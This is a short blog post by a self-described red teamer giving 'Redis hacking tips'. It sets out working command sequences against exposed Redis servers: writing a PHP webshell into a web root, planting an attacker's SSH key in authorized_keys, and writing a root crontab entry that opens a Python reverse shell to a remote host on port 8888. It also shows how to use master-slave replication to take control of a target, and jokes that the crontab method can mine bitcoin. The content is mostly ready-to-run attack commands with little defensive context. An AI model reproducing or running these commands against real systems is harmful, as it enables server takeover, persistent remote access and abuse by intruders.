Urahara's Blog

NSFOCUS M01N RedTeam Member, Co-founder of FormSec, security researcher, bug hunter, Red Teamer, pentester. Opinions are my own.

Redis Hacking Tips

09 Feb 2017 » Pentest, Database

Get Webshell

​ You must know the physical path of the Web site

root@Urahara:~# redis-cli -h> config set dir /usr/share/nginx/html
OK> config set dbfilename redis.php
OK> set test "<?php phpinfo(); ?>"
OK> save

​ If the webshell access exception, you can empty the database after backup and try again, remember to restore the database

Get SSH–Crackit

  1. Generate a ssh public-private key pair on your pc: ssh-keygen -t rsa

  2. Write the public key to a file : (echo -e “\n\n”; cat ./.ssh/id_rsa.pub; echo -e “\n\n”) > foo.txt

  3. Import the file into redis : cat foo.txt | redis-cli -h -x set crackit

  4. Save the public key to the authorized_keys file on redis server :

    root@Urahara:~# redis-cli -h> config set dir /home/test/.ssh/
    OK> config set dbfilename "authorized_keys"
    OK> save
  5. Finally, you can ssh to the redis server with private key : ssh -i id_rsa test@

Get Reverse Shell—Crontab

root@Urahara:~# echo -e "\n\n*/1 * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n\n"|redis-cli -h -x set 1
root@Urahara:~# redis-cli -h config set dir /var/spool/cron/crontabs/
root@Urahara:~# redis-cli -h config set dbfilename root
root@Urahara:~# redis-cli -h save

The above command for Ubuntu, Centos need to be adjusted to:

redis-cli -h config set dir /var/spool/cron/

This method can also be used to earn bitcoin :yam

Master-Slave Moudle

​ The master redis all operations are automatically synchronized to the slave redis, which means that we can regard the vulnerability redis as a slave redis, connected to the master redis which our own controlled, then we can enter the command to our own redis.

master redis : (Hacker's Server)
slave  redis : (Target Vulnerability Server)
A master-slave connection will be established from the slave redis and the master redis:
redis-cli -h -p 6379
slaveof 6379
Then you can login to the master redis to control the slave redis:
redis-cli -h -p 6379
set mykey hello
set mykey2 helloworld